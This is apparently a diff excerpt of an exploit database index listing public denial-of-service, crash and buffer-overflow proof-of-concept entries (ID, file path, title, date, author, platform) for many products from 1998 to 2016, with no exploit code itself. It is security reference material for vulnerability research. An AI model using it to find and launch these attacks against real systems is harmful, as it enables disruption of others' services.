+22110,exploits/php/dos/22110.txt,"PHP-Nuke 6.0 - 'modules.php' Denial of Service",2002-12-23,"Ing. Bernardo Lopez",dos,php, +22117,exploits/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",dos,windows, +22118,exploits/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",dos,windows, +22119,exploits/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",dos,windows, +22121,exploits/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,dos,windows, +22122,exploits/windows/dos/22122.pl,"EType EServ 2.9x - POP3 Remote Denial of Service",2003-01-04,D4rkGr3y,dos,windows, +22123,exploits/windows/dos/22123.pl,"EType EServ 2.9x - SMTP Remote Denial of Service",2003-01-04,D4rkGr3y,dos,windows, +22124,exploits/windows/dos/22124.pl,"EType EServ 1.9x - NNTP Remote Denial of Service",2003-01-04,D4rkGr3y,dos,windows, +22132,exploits/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,dos,windows, +22155,exploits/windows/dos/22155.pl,"Adobe Reader 10.1.4 - Crash (PoC)",2012-10-22,coolkaveh,dos,windows, +22154,exploits/windows/dos/22154.pl,"RealPlayer 15.0.6.14.3gp - Crash (PoC)",2012-10-22,coolkaveh,dos,windows, +22162,exploits/windows/dos/22162.txt,"Symantec Norton Internet Security 2003 - ICMP Packet Flood Denial of Service",2003-01-13,"Pavel P",dos,windows, +22172,exploits/windows/dos/22172.txt,"Trend Micro Virus Control System 1.8 - Denial of Service",2003-01-15,"Rod Boron",dos,windows, +22183,exploits/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",dos,linux, +22191,exploits/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",dos,linux, +22196,exploits/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",dos,windows, +22197,exploits/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",dos,linux, +22207,exploits/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",dos,multiple, +22214,exploits/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,dos,windows, +22215,exploits/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,dos,windows, +22220,exploits/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - 'Server Banner' Buffer Overflow",2003-02-04,"Dennis Rand",dos,windows, +22221,exploits/windows/dos/22221.pl,"Electrasoft 32Bit FTP 9.49.1 - Client Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",dos,windows, +22223,exploits/multiple/dos/22223.txt,"Epic Games Unreal Engine 436 - Client Unreal URL Denial of Service",2003-02-05,"Auriemma Luigi",dos,multiple, +22230,exploits/multiple/dos/22230.pl,"Netscape Enterprise Server 4.1 - HTTP Method Name Buffer Overflow",2001-05-19,"Robert Cardona",dos,multiple, +22232,exploits/windows/dos/22232.txt,"Microsoft Windows XP - HCP URI Buffer Overflow",2001-11-21,mozoral,dos,windows, +22237,exploits/windows/dos/22237.txt,"Microsoft Office Picture Manager 2010 - Crash (PoC)",2012-10-25,coolkaveh,dos,windows, +22239,exploits/windows/dos/22239.txt,"Opera 6.0/7.0 - 'Username' URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,dos,windows, +22240,exploits/windows/dos/22240.txt,"Opera 6.0/7.0 - opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",dos,windows, +22243,exploits/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow",2003-02-11,3APA3A,dos,linux, +22245,exploits/windows/dos/22245.txt,"Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow",2003-02-11,3APA3A,dos,windows, +22249,exploits/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 - 'libIM' Buffer Overflow",2003-02-12,"Euan Briggs",dos,aix, +22250,exploits/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,dos,multiple, +22255,exploits/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",dos,windows, +22258,exploits/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,dos,windows, +22259,exploits/linux/dos/22259.c,"BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service",2003-01-30,argv,dos,linux, +22273,exploits/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",dos,linux, +22286,exploits/unix/dos/22286.html,"Netscape 6.0/7.0 - Style Sheet Denial of Service",2003-02-25,Jocke,dos,unix, +22287,exploits/unix/dos/22287.html,"Netscape 7.0 - JavaScript Regular Expression Denial of Service",2003-02-25,dwm,dos,unix, +22290,exploits/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,dos,windows, +22294,exploits/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",dos,linux, +22302,exploits/windows/dos/22302.rb,"hMAilServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",dos,windows, +22303,exploits/windows/dos/22303.pl,"Microsoft Windows Help Program - 'WinHlp32.exe' Crash (PoC)",2012-10-28,coolkaveh,dos,windows, +22330,exploits/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,dos,windows, +22333,exploits/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",dos,windows, +22334,exploits/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",dos,windows, +22310,exploits/windows/dos/22310.txt,"Microsoft Publisher 2010 - Crash (PoC)",2012-10-28,coolkaveh,dos,windows, +22328,exploits/windows/dos/22328.txt,"Dr.Web 4.x - Virus Scanner Folder Name Buffer Overflow",2003-03-05,"Fernandez Madrid",dos,windows, +22345,exploits/multiple/dos/22345.txt,"Multitech RouteFinder 550 - Remote Memory Corruption",2003-03-11,"Peter Kruse",dos,multiple, +22352,exploits/linux/dos/22352.txt,"TCPDump 3.6/3.7 - Malformed RADIUS Packet Denial of Service",2003-03-14,"Bill Ralph",dos,linux, +22358,exploits/multiple/dos/22358.cfm,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (1)",2003-03-15,"Marc Schoenefeld",dos,multiple, +22359,exploits/multiple/dos/22359.xsl,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (2)",2003-03-15,"Marc Schoenefeld",dos,multiple, +22360,exploits/multiple/dos/22360.java,"Sun JDK/SDK 1.3/1.4 / IBM JDK 1.3.1 / BEA Systems WebLogic 5/6/7 - java.util.zip Null Value Denial of Service (3)",2003-03-15,"Marc Schoenefeld",dos,multiple, +22370,exploits/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service",2003-03-17,"Core Security",dos,linux, +22390,exploits/windows/dos/22390.c,"Microsoft ActiveSync 3.5 - Null Pointer Dereference Denial of Service",2003-03-20,"Andy Davis",dos,windows, +22395,exploits/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerabilities",2003-03-21,"Auriemma Luigi",dos,windows, +22397,exploits/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",dos,windows, +22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",dos,windows, +22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,dos,windows, +22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",dos,linux, +22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware, +22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",dos,hardware, +22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",dos,windows, +22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",dos,php, +22420,exploits/windows/dos/22420.txt,"Emule 0.27b - Empty Nickname Chat Request Denial of Service",2003-03-25,"Auriemma Luigi",dos,windows, +22425,exploits/php/dos/22425.php,"PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",dos,php, +22426,exploits/php/dos/22426.php,"PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption",2003-03-26,"Sir Mordred",dos,php, +22433,exploits/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 - Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",dos,linux, +22435,exploits/php/dos/22435.php,"PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow",2003-03-27,sir.mordred@hushmail.com,dos,php, +22440,exploits/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,dos,hardware, +22441,exploits/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",dos,multiple, +22446,exploits/linux/dos/22446.txt,"EZ Server 1.0 - Long Argument Local Denial of Service",2003-03-31,"gregory Le Bras",dos,linux, +22447,exploits/windows/dos/22447.txt,"HP Instant TopTools 5.0 - Remote Denial of Service",2003-03-31,"Erik Parker",dos,windows, +22460,exploits/windows/dos/22460.txt,"Abyss Web Server 1.1.2 - Incomplete HTTP Request Denial of Service",2003-04-05,"Auriemma Luigi",dos,windows, +22464,exploits/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash (PoC)",2012-11-04,coolkaveh,dos,windows, +22467,exploits/windows/dos/22467.txt,"KMPlayer 3.3.0.33 - Multiple Vulnerabilities",2012-11-04,Mr.XHat,dos,windows, +22483,exploits/osx/dos/22483.c,"Apple Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",dos,osx, +22494,exploits/php/dos/22494.txt,"osCommerce 2.2 - 'product_info.php' Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",dos,php, +22502,exploits/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,dos,multiple, +22503,exploits/multiple/dos/22503.c,"TW-WebServer 1.0 - Denial of Service (2)",2003-04-16,"Shashank pandey",dos,multiple, +22505,exploits/multiple/dos/22505.txt,"Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service",2003-04-16,zillion,dos,multiple, +22508,exploits/linux/dos/22508.sh,"Xinetd 2.1.x/2.3.x - Rejected Connection Memory Leakage Denial of Service",2003-04-18,"Steve Grubb",dos,linux, +22512,exploits/multiple/dos/22512.txt,"Mod_NTLM 0.x - Authorisation Heap Overflow",2003-04-21,"Matthew Murphy",dos,multiple, +22514,exploits/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorisation Format String",2003-04-21,"Matthew Murphy",dos,multiple, +22516,exploits/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,dos,windows, +22518,exploits/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",dos,windows, +22527,exploits/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,dos,linux, +22535,exploits/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Vulnerabilities",2003-04-24,"Positive Technologies",dos,multiple, +22536,exploits/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",dos,multiple, +22537,exploits/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,dos,linux, +22550,exploits/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",dos,windows, +22551,exploits/windows/dos/22551.pl,"3D-FTP Client 4.0 - Buffer Overflow",2003-04-28,Over_G,dos,windows, +22552,exploits/hp-ux/dos/22552.txt,"HP-UX 10.x/11.x - RExec Remote 'Username' Flag Local Buffer Overrun",2003-04-29,"Davide Del Vecchio",dos,hp-ux, +22553,exploits/windows/dos/22553.txt,"Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow",2003-04-30,"Cesar Cerrudo",dos,windows, +22560,exploits/linux/dos/22560.txt,"KDE Konqueror 3.0.3 - Malformed HTML Page Denial of Service",2003-05-02,Joachim_Strombergson,dos,linux, +22561,exploits/hp-ux/dos/22561.txt,"HP-UX 11 RWrite - Buffer Overflow",2003-05-02,bt@delfi.lt,dos,hp-ux, +22568,exploits/windows/dos/22568.pl,"FloosieTek FTGate PRO 1.22 - SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",dos,windows, +22569,exploits/windows/dos/22569.pl,"FloosieTek FTGate PRO 1.22 - SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",dos,windows, +22576,exploits/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun",2003-05-09,cesaro,dos,windows, +22581,exploits/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 - MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",dos,windows, +22582,exploits/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - 'RCPT TO' Buffer Overflow",2003-05-10,"Dennis Rand",dos,windows, +22585,exploits/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion (Denial of Service) (1)",2003-05-11,"Matthew Murphy",dos,windows, +22586,exploits/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion (Denial of Service) (2)",2003-05-11,rash,dos,windows, +22587,exploits/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Denial of Service",2003-04-26,"Angelo Rosiello",dos,windows, +22591,exploits/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,dos,windows, +22596,exploits/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli & Fabio Annunziato",dos,hardware, +22602,exploits/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",dos,palm_os, +22608,exploits/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,dos,windows, +22610,exploits/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Buffer Overflow",2003-05-16,euronymous,dos,windows, +22619,exploits/linux/dos/22619.txt,"CUPS 1.1.x - Cupsd Request Method Denial of Service",2003-05-20,"Phil D'Amore",dos,linux, +22621,exploits/windows/dos/22621.txt,"Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",dos,windows, +22624,exploits/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",dos,linux, +22629,exploits/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow",2003-05-22,"Sir Mordred",dos,osx, +22634,exploits/multiple/dos/22634.txt,"Nessus 2.0.x - LibNASL Arbitrary Code Execution",2003-05-22,"Sir Mordred",dos,multiple, +22637,exploits/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,dos,windows, +22638,exploits/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,dos,irix, +22647,exploits/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",dos,hardware, +22650,exploits/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,dos,multiple, +22653,exploits/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",dos,windows, +22655,exploits/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,dos,windows, +22660,exploits/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",dos,php, +22666,exploits/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,dos,windows, +22667,exploits/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",dos,windows, +22668,exploits/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",dos,windows, +22670,exploits/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,dos,windows, +22679,exploits/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,dos,windows, +22680,exploits/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",dos,windows, +22681,exploits/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",dos,windows, +22685,exploits/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,dos,windows, +40411,exploits/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,dos,windows, +22690,exploits/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",dos,windows, +22694,exploits/windows/dos/22694.c,"Desktop Orbiter 2.0 1 - Resource Exhaustion (Denial of Service)",2003-05-30,"Luca Ercoli",dos,windows, +22700,exploits/linux/dos/22700.c,"MyServer 0.4.3 - GET Argument Buffer Overflow",2003-09-08,badpack3t,dos,linux, +22701,exploits/linux/dos/22701.c,"MyServer 0.5 - GET Argument Buffer Overflow",2003-09-08,badpack3t,dos,linux, +22706,exploits/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote 'Username' Format String",2003-06-02,"Luca Ercoli",dos,windows, +22707,exploits/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",dos,windows, +22718,exploits/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,dos,windows, +22739,exploits/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,dos,hardware, +22749,exploits/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",dos,novell, +22757,exploits/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service Vulnerabilities",2003-06-11,posidron,dos,windows, +22759,exploits/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",dos,windows, +22774,exploits/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,dos,windows, +22780,exploits/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",dos,windows, +22788,exploits/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,dos,windows, +22789,exploits/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,dos,windows, +22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,dos,windows, +22794,exploits/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of Service",2003-06-17,dr_insane,dos,windows, +22796,exploits/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",dos,linux, +22797,exploits/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",dos,hardware, +22800,exploits/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow",2003-06-18,"David F.Madrid",dos,linux, +22801,exploits/linux/dos/22801.txt,"Kerio MailServer 5.6.3 add_acl Module - Overflow",2003-06-18,"David F.Madrid",dos,linux, +22802,exploits/linux/dos/22802.txt,"Kerio MailServer 5.6.3 list Module - Overflow",2003-06-18,"David F.Madrid",dos,linux, +22803,exploits/linux/dos/22803.txt,"Kerio MailServer 5.6.3 do_map Module - Overflow",2003-06-18,"David F.Madrid",dos,linux, +22814,exploits/linux/dos/22814.txt,"GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption",2003-06-21,"dong-h0un U",dos,linux, +22816,exploits/windows/dos/22816.txt,"Symantec Security Check RuFSI - ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",dos,windows, +22817,exploits/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,dos,windows, +22822,exploits/windows/dos/22822.txt,"Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",dos,windows, +22823,exploits/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",dos,windows, +22825,exploits/windows/dos/22825.c,"Armida Databased Web Server 1.0 - GET Remote Denial of Service",2003-06-23,posidron,dos,windows, +22831,exploits/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,dos,freebsd, +22839,exploits/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,dos,linux, +22844,exploits/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,dos,windows, +22846,exploits/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 - WWWLaunchNetscape Buffer Overflow",2003-07-01,"Paul Szabo",dos,linux, +22850,exploits/windows/dos/22850.txt,"Microsoft Office OneNote 2010 - Crash (PoC)",2012-11-20,coolkaveh,dos,windows, +22855,exploits/windows/dos/22855.txt,"Apple QuickTime 7.7.2 - Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",dos,windows, +22859,exploits/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 - Web Interface Denial of Service",2003-07-03,"Ian Vitek",dos,multiple, +22875,exploits/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",dos,windows, +22876,exploits/hardware/dos/22876.txt,"Canon GP300 - Remote GET Denial of Service",2003-07-07,"DOUHINE Davy",dos,hardware, +22878,exploits/windows/dos/22878.txt,"Adobe Reader 10.1.4 - JP2KLib&CoolType Crash (PoC)",2012-11-21,coolkaveh,dos,windows, +22897,exploits/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Buffer Overflow",2003-07-07,posidron,dos,linux, +22899,exploits/windows/dos/22899.txt,"StarSiege Tribes Server - Denial of Service (1)",2003-06-10,st0ic,dos,windows, +22900,exploits/windows/dos/22900.php,"StarSiege Tribes Server - Denial of Service (2)",2003-07-14,st0ic,dos,windows, +22902,exploits/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service (PoC)",2012-11-22,t4c,dos,linux, +22904,exploits/linux/dos/22904.py,"TrouSerS - Denial of Service",2012-11-23,"Andy Lutomirski",dos,linux, +22945,exploits/windows/dos/22945.txt,"Savant Web Server 3.1 - Denial of Service",2003-07-21,dr_insane,dos,windows, +22947,exploits/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service",2003-07-21,"David F.Madrid",dos,hardware, +22949,exploits/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",dos,netware, +22950,exploits/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",dos,hardware, +22952,exploits/linux/dos/22952.txt,"xfstt 1.2/1.4 - Memory Disclosure",2003-07-23,V9,dos,linux, +22957,exploits/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,dos,windows, +22962,exploits/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - GET Denial of Service",2003-07-28,blackangels,dos,hardware, +22918,exploits/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,dos,unix, +22920,exploits/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,dos,unix, +22926,exploits/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",dos,multiple, +22935,exploits/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",dos,multiple, +22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,dos,linux, +22970,exploits/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",dos,windows, +23003,exploits/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash (PoC)",2012-11-29,p3kok,dos,windows, +22978,exploits/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,dos,hardware, +22981,exploits/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,dos,linux, +22982,exploits/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,dos,linux, +40406,exploits/windows/dos/40406.txt,"Microsoft Office PowerPoint 2010 - Invalid Pointer Reference",2016-09-21,"Google Security Research",dos,windows, +22983,exploits/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,dos,hardware, +22987,exploits/multiple/dos/22987.pl,"EveryBuddy 0.4.3 - Long Message Denial of Service",2003-08-05,"Noam Rathaus",dos,multiple, +22991,exploits/hardware/dos/22991.txt,"D-Link DI-704P - Long URL Denial of Service",2003-08-06,chris@cr-secure.net,dos,hardware, +22999,exploits/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 - USER Memory Corruption",2003-08-08,zerash,dos,windows, +40405,exploits/multiple/dos/40405.txt,"Symantec RAR Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",dos,multiple, +23042,exploits/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",dos,windows, +23048,exploits/linux/dos/23048.txt,"Srcpd 2.0 - Remote Integer Overflow",2003-08-21,Over_G,dos,linux, +23050,exploits/multiple/dos/23050.txt,"Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow",2003-08-21,nimber@designer.ru,dos,multiple, +23051,exploits/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",dos,multiple, +23053,exploits/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,dos,windows, +23056,exploits/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service",2003-08-25,"Luca Ercoli",dos,windows, +23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,dos,linux, +23078,exploits/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,dos,linux, 